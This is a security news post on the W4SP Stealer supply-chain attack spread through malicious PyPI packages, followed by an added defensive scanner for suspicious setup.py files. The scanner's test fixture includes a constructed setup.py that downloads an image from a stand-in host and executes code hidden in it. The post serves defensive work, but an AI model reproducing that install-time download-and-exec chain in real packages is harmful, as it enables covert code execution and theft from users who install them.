November 29, 2022 - TuxCare expert team
Security researchers from Checkmarx have uncovered an ongoing supply chain attack that involves spreading the malware identified as W4SP Stealer.
W4SP Stealer is a Discord-focused information stealer that grabs Discord accounts, passwords, crypto wallets, credit card details and other data from a victim’s PC and sends them back to the attacker.
W4SP Stealer is currently sold for $20, and interested buyers can pay with crypto or gift cards. The maker of WASP claims it is entirely undetectable and is “protected by some awesome obfuscation.”
The attackers distribute the malware through malicious Python packages. Checkmarx reports that hundreds of users have already fallen victim to it. Checkmarx’s report therefore corroborates findings from Phylum and Check Point, which flagged 30 different modules published on the Python Package Index (PyPI). These modules were specifically designed to propagate malicious code under the guise of benign-looking packages.
According to researchers at Checkmarx, the threat actor behind the attacks is “WASP.” The attacker uses polymorphic malware, reboot persistence and steganography to hide code inside packages, building a fake GitHub reputation in the process.
Polymorphic code uses a polymorphic engine to mutate while keeping the original algorithm intact. This means that the code changes itself every time it runs, although the function of the code remains the same. The technique is used by computer viruses, shellcode and computer worms to hide their presence.
After the malicious package is installed, its setup.py script is executed and additional Python packages are installed. The setup.py script downloads a .PNG image and saves it in the operating system’s temp directory. The setup.py script then uses the “lsb.reveal” function located in the malicious “judyb” package to extract hidden code from the downloaded image.
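As an added defensive example (not from the article or from Checkmarx), the following heuristic scan parses a setup.py and flags the install-time pattern just described: a steganography library import or dependency, a download during install, staging in the temp directory, an lsb.reveal call and dynamic execution of the result. The sample setup.py is constructed for the test, and the watchlist entry “stegano” is an assumption; only “judyb” comes from the article.

```python
import ast

# Watchlist: "judyb" is named in the article; "stegano" is an assumption (the real library it mimicked).
STEGO_MODULES = {"judyb", "stegano"}
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post"}
EXEC_CALLS = {"exec", "eval", "compile"}
# Constructed sample (not a real package), shaped like the install chain described above.
SAMPLE_SETUP_PY = """\
import tempfile, os, urllib.request
from setuptools import setup
from judyb import lsb
path = os.path.join(tempfile.gettempdir(), "img.png")
urllib.request.urlretrieve("https://example.invalid/img.png", path)
exec(lsb.reveal(path))
setup(name="benign_looking_pkg", install_requires=["judyb"])
"""

def _dotted(node):
    # Render a call target such as urllib.request.urlretrieve as one string.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    parts.append(node.id if isinstance(node, ast.Name) else "?")
    return ".".join(reversed(parts))

def scan_setup_py(source):
    """Return sorted (lineno, finding) tuples for suspicious install-time code."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = [a.name for a in node.names] + [getattr(node, "module", None) or ""]
            hits += [(node.lineno, f"stego import {m}") for m in mods
                     if m.split(".")[0] in STEGO_MODULES]
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            root, last = name.split(".")[0], name.rsplit(".", 1)[-1]
            if last == "reveal":                 # lsb.reveal(): pull hidden code out of the image
                hits.append((node.lineno, f"stego reveal {name}"))
            elif root in {"urllib", "requests"} and last in NETWORK_CALLS:
                hits.append((node.lineno, f"network fetch {name}"))   # download during install
            elif root == "tempfile":             # staging the image in the OS temp directory
                hits.append((node.lineno, f"temp dir {name}"))
            elif name in EXEC_CALLS:             # running whatever was extracted
                hits.append((node.lineno, f"dynamic exec {name}"))
            elif name == "setup":                # stego library declared as a dependency
                deps = [c.value for kw in node.keywords if kw.arg == "install_requires"
                        for c in getattr(kw.value, "elts", []) if isinstance(c, ast.Constant)]
                hits += [(node.lineno, f"stego dependency {d}") for d in deps if d in STEGO_MODULES]
    return sorted(hits)
```

Run it over a package’s setup.py before installing from an untrusted index; a benign setup.py that only declares metadata produces no findings.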
The sources for this piece include an article in TheHackerNews.